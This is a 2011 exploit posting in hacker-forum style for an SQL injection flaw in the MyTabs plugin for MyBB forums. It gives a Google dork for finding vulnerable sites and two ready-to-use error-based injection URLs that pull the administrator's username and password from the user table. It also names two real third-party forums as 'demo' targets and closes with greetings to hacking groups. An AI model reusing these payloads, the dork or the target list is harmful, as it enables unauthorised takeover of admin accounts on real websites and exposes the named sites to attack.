MyBB 0day \ MyTabs (plugin) Blind SQL injection vulnerability

# Exploit title : MyBB 0day \ MyTabs (plugin) SQL injection vulnerability.
# Author: AutoRUN & dR.sqL
# Share : Bekasi0d0nk (Admin MAHO) & Andrian21 (Orang Ganteng)
# Home : HackForums.AL , Autorun-Albania.COM , HackingWith.US , Childzcyber.web.id
# Date : 01 \ 08 \ 2011
# Tested on : Windows XP , Linux
# Category : web apps
# Software Link : http://adf.ly/2GtLF
# Google dork : inurl:/forum/index.php?tab= "Powered By MyBB"

Vulnerability :

$~ http://localhost/mybbpath/index.php?tab=[SQLi]

---------------------------------------
# ~ Expl0itation ~ #
---------------------------------------

$~ Get the administrator's username (usually it has uid=1) ~

http://localhost/mybbpath/index.php?tab=1' and(select 1 from(select count(*),concat((select username from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- -

$~ Get the administrator's password ~

http://localhost/mybbpath/index.php?tab=1' and(select 1 from(select count(*),concat((select password from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- -


---------------------------------------
# ~ Demos ~ #
---------------------------------------

http://www.malluvdo.net/forum/index.php?tab=4' (secworm - Ethical Hacking & IT security forum - ROFL !)
http://www.network-unlimited.com/forum/index.php?tab=2'


# Greetz : Programer , Dr.moka, eragon, BaDBoY-AL , z3r0w1zard , Red Dragon_aL , Pretorian ,Th3_Power , R-t33n , Ace Wizard, KubaNnez1 , ssgodfather, DJDukli , b4ti , CroSs HackForums.AL members & All our friends.


# 2011 ChildzCyber.Web.Id
© Andrian21 All Rights Reserved